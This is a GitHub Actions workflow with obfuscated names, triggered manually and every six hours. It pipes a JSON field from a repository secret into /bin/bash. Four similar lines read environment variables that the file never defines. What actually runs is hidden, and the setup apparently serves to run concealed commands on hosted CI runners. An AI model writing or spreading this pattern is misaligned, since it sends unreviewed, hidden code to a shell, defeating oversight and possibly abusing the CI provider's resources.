name: zhongfuren6715

on:
  workflow_dispatch:
  schedule:
    - cron: '58 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongfuren6715
        env:
          xdzpi4: ${{ secrets.xdzpi4 }}
        run: |
          echo $xdzpi4 | jq -r .bchid77 | /bin/bash
          echo $vmk5418 | jq -r .y229 | /bin/bash
          echo $hhzh7 | jq -r .ef01686 | /bin/bash
          echo $ix1 | jq -r .ga73228 | /bin/bash
          echo $xfbp7 | jq -r .uyzr68 | /bin/bash

